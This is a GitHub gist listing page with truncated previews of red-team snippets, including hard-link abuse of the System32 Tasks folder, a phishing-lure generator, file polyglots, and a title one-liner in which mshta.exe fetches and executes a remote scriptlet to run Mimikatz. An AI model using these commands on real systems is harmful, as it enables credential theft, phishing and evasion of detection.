Skip to content

Instantly share code, notes, and snippets.

View djhohnstein's full-sized avatar

Dwight Hohnstein djhohnstein

View GitHub Profile
@djhohnstein
djhohnstein / Cleanup-ClickOnce.ps1
Created June 27, 2023 21:11 — forked from mgeeky/Cleanup-ClickOnce.ps1
Cleanup-ClickOnce.ps1 - Simple Powershell script that removes ClickOnce deployments entirely from file system and registry.
#
# Usage:
# PS> . .\Cleanup-ClickOnce.ps1
# PS> Cleanup-ClickOnce -Name MyAppName
#
# Other than that you might also try using these commands:
# PS> rundll32 dfshim.dll,ShArpMaintain C:\Path\To\ClickOnce.application
# PS> rundll32 dfshim.dll CleanOnlineAppCache
#
@djhohnstein
djhohnstein / tasks.cs
Created June 13, 2023 14:32
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@djhohnstein
djhohnstein / Update_Notes.md
Created June 13, 2023 14:32
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@djhohnstein
djhohnstein / mimikatz.sct
Created April 13, 2023 16:30 — forked from vector-sec/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@djhohnstein
djhohnstein / Entry.c
Created March 29, 2023 17:42 — forked from realoriginal/Entry.c
TLDR: How a socks proxy client is written to tunnel connections from a 'teamserver' to an agent.
/*!
*
* RPROXICMP
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
@djhohnstein
djhohnstein / google_lure.py
Created December 1, 2022 04:05 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@djhohnstein
djhohnstein / FastDoubling.cs
Created July 26, 2022 20:31
FastDoubling - Mod RSA 129
using System;
class GFG{
// Function calculate the N-th fibonacci
// number using fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
{
BigInteger a, b, c, d;
BigInteger MOD = new BigInteger ("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541",10);
@djhohnstein
djhohnstein / pnginator.rb
Created July 26, 2022 20:31
pnginator: pack Javascript into a self-extracting PNG
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <http://matt.west.co.tt/>
# from an original idea by Daeken: http://daeken.com/superpacking-js-demos
@djhohnstein
djhohnstein / gifjs.asm
Created July 26, 2022 20:31
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@djhohnstein
djhohnstein / Update_Notes.md
Created July 26, 2022 20:31
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html